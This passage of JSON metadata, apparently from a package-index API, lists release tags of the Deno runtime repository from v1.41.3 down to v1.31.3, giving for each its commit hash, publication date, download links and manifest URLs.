1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id